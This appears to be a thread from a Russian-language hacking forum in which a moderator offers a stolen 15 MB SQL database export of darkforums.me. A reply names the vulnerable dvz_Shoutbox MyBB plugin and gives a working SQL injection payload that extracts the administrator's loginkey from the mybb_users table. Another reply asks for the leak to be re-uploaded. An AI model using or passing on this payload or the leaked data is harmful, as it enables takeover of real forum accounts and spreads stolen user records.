• XSS.stack #1 – первый литературный журнал от юзеров форума

SQL darkforums.me

SenjorZeroday

Информатик
Модератор
Регистрация
23.11.2020
Сообщения
338
Реакции
204
Website: darkforums.me
Type: SQL Export
Size: 15mb
Скрытый контент для зарегистрированных пользователей.

Screenshot_1.png
 
Пожалуйста, обратите внимание, что пользователь заблокирован
They have been hacked because their shoutbox.
dvz_Shoutbox is very, very vulnerable to different type of SQL errors.
"',(SELECT ASCII((RIGHT((select loginkey from mybb_users where uid=1),50)))*99),'')#

to make it useable you have to be able to post a thread. so the shoutbox can read it. Ty.
 
Может кто перезалить?
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх